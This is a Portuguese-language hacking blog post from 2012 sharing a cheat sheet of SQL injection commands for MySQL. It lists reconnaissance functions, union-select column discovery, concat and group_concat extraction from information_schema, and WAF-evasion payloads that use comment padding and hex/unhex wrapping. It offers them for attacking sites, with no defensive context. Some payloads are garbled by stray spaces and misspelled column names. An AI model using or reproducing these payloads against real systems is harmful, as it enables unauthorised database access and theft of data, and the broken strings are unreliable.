quarta-feira, 20 de junho de 2012

Dica: Comandos Usados na Hora da Injeção

sql


Olá caros leitores,
Venho disponibilizar a vocês uma lista de comandos postados por nosso amigo 5ubzer0.
São comandos úteis em uma injeção SQL.
Comandos:
Comandos basicos:
user(): Para conhecer o banco de dados do usuário ajuda a descobrir o PhpMyAdmin
version():Versão do Banco de Dados
database():Nome do Banco de Dados
@@datadir:Localização do Banco de Dados
+order+by+escobrir a Quantidade de Colunas
+union+select: Uniao das Colunas
Comandos de Extração:
Exemplos:
concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)
concat_ws(0x3a3a3a,table_name,column_name)
concat(column_name,0x3a,table_schema,0x2e,table_na me)
group_concat(column_nome,0x3a,table_schema,0x2e,ta ble_nome)+from+information_schema.columns+where+co lumn_nome+like+char
Metodos de filtragem:
hex(unhex()
AES_ENCRYPT()
AES_ENCRYPT().
Exemplos:
/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1
/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *
/*–*/ UNION/*–*/ select /*–*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*–*/ from /*–*/ INFORMATION_SCHEMA.COLUMNS/*–*/LIMIT /*–*/ 180,1 / *
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86